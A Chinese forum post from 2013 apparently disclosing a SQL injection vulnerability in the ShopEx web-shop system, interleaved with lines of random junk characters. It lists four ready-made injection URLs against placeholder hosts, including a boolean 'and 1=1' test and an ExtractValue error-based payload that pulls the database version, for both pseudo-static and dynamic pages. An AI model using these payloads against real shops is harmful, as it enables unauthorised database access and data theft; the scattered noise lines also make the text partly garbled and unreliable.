注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… ( `- D6 `- }6 ]* X3 j# D
e( p) C$ b |+ ?7 O! y好吧,我扯远了~~7 n: x8 R- r0 U% |3 Y2 f& B( {
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
1 E9 |9 m) ]' b6 w$ L4 g3 \不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- M; ^% I1 Y7 r) X% E2 K9 f& l& W( v, g' d) G# |
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
Z+ z) a: U! Z- Y! e9 t' S; Q. M7 Z* b$ I$ j: y) Q
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
. G7 ]) M" D% }% t1 O; V- t
; `+ w( O0 ~1 \* s) C% n: ^http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html . @4 m6 R' P6 M6 g4 M" a
$ A2 ]. {" Q3 dhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
% l3 a, [& L4 m, @# y" Z' s( S* S* r1 I3 }* i
5 h9 W( M8 R' d5 X4 z一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
) g5 Y* p9 D' R* f. J& h W如何注入就不多说了,10多年的东西了…不会也会了…
' i+ s; e" F+ Z) X, c# T
, l9 y8 n" s! N
* f1 i; F: D7 h0 }, e0 S& H% h0 k: r. |/ c/ ~( c6 }$ j9 W! u
, j& _ ?; C- P7 W$ D |
发表于 2013-2-19 08:31:27
收藏
支持
反对